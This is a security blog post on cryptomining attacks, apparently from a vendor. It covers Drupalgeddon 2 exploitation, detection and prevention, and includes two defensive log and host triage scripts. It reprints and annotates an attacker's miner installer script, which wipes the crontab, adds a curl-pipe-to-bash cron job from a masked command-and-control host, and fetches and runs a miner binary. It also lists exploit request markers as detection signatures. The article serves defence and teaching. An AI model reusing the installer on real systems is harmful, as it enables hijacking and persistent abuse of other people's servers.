Cryptomining – How Prevalent Is It And How To Stop It

Crypto miners are one of the more recent additions to the threat landscape plaguing organizations. With the rise in popularity of cryptocurrency, attackers have shifted their attention to gaining access to as many computing resources as they can find; the end goal of these attacks is to use the victim's CPU to mine cryptocurrency. To gain that access, attackers cycle through whichever popular internet-facing applications currently have an exploitable vulnerability.

The payloads these crypto miners drop have all been very similar, differing mainly in how they are re-packed or re-encrypted to evade EDR and AV products. Many will argue that cryptocurrency mining ("cryptomining") is a victimless crime: automated bots siphon processing power without any user interaction, and the outcome is nowhere near the headache of a ransomware incident. The truth is that these attacks are a threat in their own right. In the worst case, unthrottled mining consumes enough CPU to cause serious latency on the host and can render the service it runs unavailable, and the foothold that installed the miner could have installed anything else.

You probably have it in your environment

It is highly likely that you have already experienced this threat the hard way, by finding an unresponsive server or noticing latency or sluggish behavior on your network or devices. Even if you haven't noticed it yet, if you have an externally facing web server the chance that you are affected is elevated. You may also lack a reliable way to tell whether other servers on your network are affected, or to stop the threat from getting a foothold in the first place. In this post we go through ways to both identify this threat and protect your network.

Real World Example

As with all defensive measures, it is important to understand the scope of the threat and have proper visibility into the environment. As an example, let's focus on servers compromised for cryptomining through the recent Drupalgeddon 2 exploit. This attack, which at this writing has impacted over 400 government and university websites worldwide, leverages the critical remote-code execution (RCE) vulnerability CVE-2018-7600, as reported by Troy Mursch, a researcher with Bad Packets Report.

This particular threat can be broken down into two actions:
1. An attacker gaining access to a host
2. Introducing a method to start a CryptoMining process.

Let’s dive into how we can detect and prevent these activities.

How Cryptominers gain access

As was the case with the Drupalgeddon 2 attacks, criminals conduct large-scale scans across the internet for vulnerable software in order to gain code execution on a server. With tools such as urlscan.io, both attackers and defenders can determine which externally facing web services are running out-of-date, vulnerable software. Once vulnerable services are identified, an exploit is built and delivered to the server in a web request, giving the attacker remote code execution (RCE) on the host, normally as the account the web server runs under. That RCE is the goal of this first action.

Detection

  • Ensure proper logging – Verify that logging of successful ingress and egress traffic is enabled at the network edge. Any internet-facing web server should be configured to log every request with the true source IP; if the server sits behind a load balancer or reverse proxy, that means logging the forwarded client address rather than the proxy's. Once properly logged, these events should be centralized for analysis and monitored for anomalous behavior.
  • Behavior analysis – Once logging is established and centralized, baseline the logs so that unusual activity stands out. Hunting through the logs for indicators of compromise and anomalous activity provides additional insight into an intrusion. Even simple alerts, such as an excessive number of failed logins or a burst of 4xx responses from a single source, help identify intrusion attempts.
  • Network signatures – Use an intrusion detection/prevention system (IDS/IPS) with rulesets targeting the exploit traffic, including custom rules for the specific vulnerability being exploited.
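As an added example, not part of the original post or of any vendor's tooling, the following Python script shows the signature-plus-baseline hunt described above, run over a handful of constructed Apache combined-format log lines. The request marker it looks for is the widely published shape of the CVE-2018-7600 exploit request against /user/register; the sample IPs, paths and the scanner thresholds are assumptions for illustration, not data from a real incident.

```python
"""Hunt web-server access logs for exploit attempts and scanning behaviour.

Added example; the log lines below are constructed, not captured from a real host.
"""
import re
from collections import Counter

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Assumption: the widely published CVE-2018-7600 request shape injects a
# renderable array through the Form API; these substrings survive in the
# query string that the access log records, even though POST bodies do not.
DRUPALGEDDON2_MARKERS = (
    "element_parents=account/mail/%23value",
    "%23post_render",
    "#post_render",
)

# Constructed sample: one exploit attempt, one noisy scanner, one normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Apr/2018:10:02:11 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
198.51.100.2 - - [25/Apr/2018:10:02:15 +0000] "GET /node/1 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Apr/2018:10:03:01 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "-"
203.0.113.9 - - [25/Apr/2018:10:03:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "-"
203.0.113.9 - - [25/Apr/2018:10:03:02 +0000] "GET /.env HTTP/1.1" 404 210 "-" "-"
203.0.113.9 - - [25/Apr/2018:10:03:03 +0000] "GET /admin/ HTTP/1.1" 403 199 "-" "-"
203.0.113.9 - - [25/Apr/2018:10:03:04 +0000] "GET /user/login HTTP/1.1" 200 6000 "-" "-"
198.51.100.2 - - [25/Apr/2018:10:04:00 +0000] "GET /favicon.ico HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.2 - - [25/Apr/2018:10:04:05 +0000] "GET /node/2 HTTP/1.1" 200 8300 "-" "Mozilla/5.0"
"""


def parse(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def exploit_attempts(lines):
    """Signature check: requests carrying a Drupalgeddon 2 marker in the URL."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec and any(marker in rec["path"].lower() for marker in DRUPALGEDDON2_MARKERS):
            hits.append((rec["ip"], rec["path"], rec["status"]))
    return hits


def scanners(lines, error_ratio=0.5, min_requests=5):
    """Behaviour check: sources whose responses are mostly 4xx/5xx.

    A legitimate visitor rarely produces a run of errors; a scanner probing
    for many different applications does. Tune both thresholds against the
    baseline of your own logs.
    """
    total, errors = Counter(), Counter()
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        total[rec["ip"]] += 1
        if rec["status"][0] in "45":
            errors[rec["ip"]] += 1
    return sorted(ip for ip, n in total.items()
                  if n >= min_requests and errors[ip] / n >= error_ratio)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, path, status in exploit_attempts(lines):
        print(f"EXPLOIT  {ip} -> {path} ({status})")
    for ip in scanners(lines):
        print(f"SCANNER  {ip}")
```

The signature match fires on the exploit request itself even when the response was 200, which is exactly the case you care about: a successful exploit looks like a normal request unless you know the shape of the URL. The ratio check is deliberately simple; in production you would window it by time and feed it from the centralized logs rather than a single file.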

Prevention

  • Active patching – With the exception of zero-day vulnerabilities, most of the vulnerabilities being exploited have already been patched by the vendor; an agile vulnerability management program is required to ensure you apply those patches before the scanners find you.
  • Proactive blocking with open-source intelligence – Blocking the attacking IPs reported by other organizations will not completely erase the risk, but it can greatly diminish it. Good examples of such reporting are the Volexity blog on Drupalgeddon 2 and the Cybercrime IP Feeds.

Once they've exploited you (the cryptomining process)

Once the attacker has access to the server, the next step is to achieve their goal, which in this case is to start a mining process. This can be accomplished in many ways, but the most common is to use wget or curl, as part of the initial exploit, to pull a script down from a command-and-control (C2) server. One example of such a script is shown below (the C2 address appears as xzy.xyz.xyz.xyz).

#!/bin/sh
# Kill every process other than the miner ("suppoie") that is using more than
# 40% CPU: this evicts competing miners and any other heavy workload.
ps aux | grep -vw suppoie | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
# Remove a rival miner's drop location.
rm -rf /dev/shm/jboss
# If the miner is already running, do nothing; otherwise install it.
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
# Persistence: wipe the account's existing crontab and replace it with a job
# that re-downloads and runs the stager every minute, then fetch the miner
# configuration and the ELF miner binary into /var/tmp.
crontab -r || true && \
echo "* * * * * curl -s http://xzy.xyz.xyz.xyz/logo7.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/config.json http:// xzy.xyz.xyz.xyz:8220/1.json
curl -o /var/tmp/suppoie http:// xzy.xyz.xyz.xyz:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
# Size the miner to half of the hardware threads and try to reserve huge pages
# (needs root; the backticks around $num are the attacker's own bug and run the
# number as a command, so the sysctl value comes out empty).
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."

The script first kills any process other than its own miner that is using more than 40% CPU, evicting competing miners and any other heavy workload, and deletes a rival miner's files. If its miner (suppoie) is already running it does nothing; otherwise it wipes the account's existing crontab and installs a job that re-downloads and runs the stager every minute, which guarantees persistence. Next it downloads the miner configuration and the ELF miner binary into /var/tmp, sizes itself to half of the host's hardware threads by counting entries in /proc/cpuinfo, and attempts to raise vm.nr_hugepages (which only succeeds if it is running as root). Finally, it launches the binary with the configuration file as a parameter, detached with nohup. At that point the host is running a cryptominer, and it only took a matter of seconds. Note that the script limits the miner's thread count to roughly half of the host's CPUs: this throttling reduces the impact on the server (and therefore on its visitors), so the load is less likely to be noticed and the miner is harder to detect. Let's see how this can be prevented, or detected once it occurs.

Detection

  • File integrity monitoring – Servers should be configured so that changes to important files, such as user and system crontabs, are detected whether they are malicious or unintentional, with alerts for any such change. Removing an existing crontab (crontab -r, as the script above does) should be just as alarming as adding an entry.
  • Open-source signatures – Use a network intrusion detection/prevention system with rulesets targeting the activity: the stager download, the miner binary fetch, and the miner's outbound traffic. On the host, a process executing from /tmp, /var/tmp or /dev/shm, or sustained high CPU use by an unfamiliar binary, is a strong indicator.
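As an added example that is not part of the original post, the following Python triage script applies the host-side checks above (crontab integrity against a baseline, download-and-execute cron entries, and processes running hot or from a temp or relative path) to constructed stand-ins for crontab -l and ps aux output that mirror the script's behaviour. The file names, PIDs and the 40% CPU threshold are assumptions taken from the script itself, not data from a real incident.

```python
"""Host-side triage for the miner installation pattern shown above.

Added example; all artefacts below are constructed stand-ins for output a
responder would collect with `crontab -l`, `ps aux` and a file-hash baseline.
"""
import hashlib
import re

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# A downloader piped straight into a shell: the persistence trick in the script above.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")

# The crontab as it looked before the compromise (constructed baseline).
BASELINE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
"""

# What `crontab -l` shows after the stager has run (constructed).
CRONTAB_DUMP = BASELINE_CRONTAB + "* * * * * curl -s http://xzy.xyz.xyz.xyz/logo7.jpg | bash -s\n"

# `ps aux` output with the miner running under the web-server account (constructed).
PS_DUMP = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  22516  3980 ?        Ss   Apr24   0:01 /sbin/init
www-data  1443  0.2  1.5 301520 61220 ?        S    Apr24   0:09 /usr/sbin/apache2 -k start
www-data  2811 97.4  0.8  62400 32116 ?        Sl   10:05  43:12 ./suppoie -c config.json -t 2
www-data  2834  0.0  0.0  11568  1024 ?        S    10:05   0:00 sleep 3
"""


def fingerprint(content):
    """File-integrity baseline: SHA-256 of the file content."""
    return hashlib.sha256(content.encode()).hexdigest()


def crontab_changed(current, baseline_digest):
    """True when the crontab no longer matches the recorded baseline."""
    return fingerprint(current) != baseline_digest


def suspicious_cron(crontab_text):
    """Cron entries that download-and-execute or reference world-writable temp dirs."""
    found = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)          # five schedule fields, then the command
        if len(fields) < 6:
            continue
        command = fields[5]
        if PIPE_TO_SHELL.search(command) or any(d in command for d in TEMP_DIRS):
            found.append(line)
    return found


def suspicious_processes(ps_text, cpu_threshold=40.0):
    """Processes that look like a miner: hot CPU, or executing from a temp/relative path."""
    findings = []
    for line in ps_text.splitlines()[1:]:     # skip the header row
        parts = line.split(None, 10)          # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(parts) < 11:
            continue
        pid, cpu, command = parts[1], float(parts[2]), parts[10]
        exe = command.split()[0]
        reasons = []
        if cpu > cpu_threshold:
            reasons.append(f"cpu {cpu}% above {cpu_threshold}%")
        if exe.startswith("./") or exe.startswith(TEMP_DIRS):
            reasons.append(f"executes from {exe}")
        if reasons:
            findings.append({"pid": pid, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    baseline = fingerprint(BASELINE_CRONTAB)
    print("crontab changed:", crontab_changed(CRONTAB_DUMP, baseline))
    for entry in suspicious_cron(CRONTAB_DUMP):
        print("cron:", entry)
    for p in suspicious_processes(PS_DUMP):
        print(f"pid {p['pid']}: {p['command']} ({'; '.join(p['reasons'])})")
```

The integrity check is the cheapest and most reliable of the three: the stager replaces the whole crontab, so the hash changes even if the attacker had chosen a less obvious command. The process check deliberately reuses the miner's own 40% figure; a real deployment would take its thresholds from the host's measured baseline.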

Prevention

  • Proper permissions – One way to stop this attack from succeeding is to run the externally facing service under a limited account with only the permissions needed to operate: no sudo rights, a web root it cannot write to, and world-writable locations such as /tmp and /var/tmp mounted noexec so a downloaded binary cannot be run from them. Against the script above, that alone blocks running the miner from /var/tmp and the sysctl change.
  • Egress traffic enforcement – Any internet-facing server should have a defined list of hosts and networks it needs to initiate communications with, and be restricted to those at the firewall. Even if the host is compromised through the RCE vulnerability, the follow-on C2 download (curl to an arbitrary address on port 8220 in the example) and the miner's own outbound connection would then fail, or at least be logged.
  • Proactive blocking with open-source intelligence – Blocking the command-and-control IPs reported by other organizations will not completely erase the risk, but it can greatly diminish it.

If you detect the threat in your environment, you need to remove the cryptominer safely. Different compromises leave different artifacts, so to completely eradicate the miner you must review every form of persistence on the host (cron jobs, services, modified startup scripts, added keys or accounts) and ensure all of them are removed. This involves a root-cause analysis to determine how the attacker got in and what effect the attack had on the system. System owners can also identify when the attack occurred and use backups to restore the host to a known-good state. Before the system goes back into production, however, the root cause must be patched so the same exploit does not compromise it again.

As cryptominers become the new trend in mass attacks against vulnerable servers, your network doesn't have to become the next victim. By applying the proactive measures in this post you will know when an attack happens and prevent it from successfully compromising your servers. If you believe you have already fallen victim but aren't sure where to start, TBG Security offers a range of services to help secure your environment.
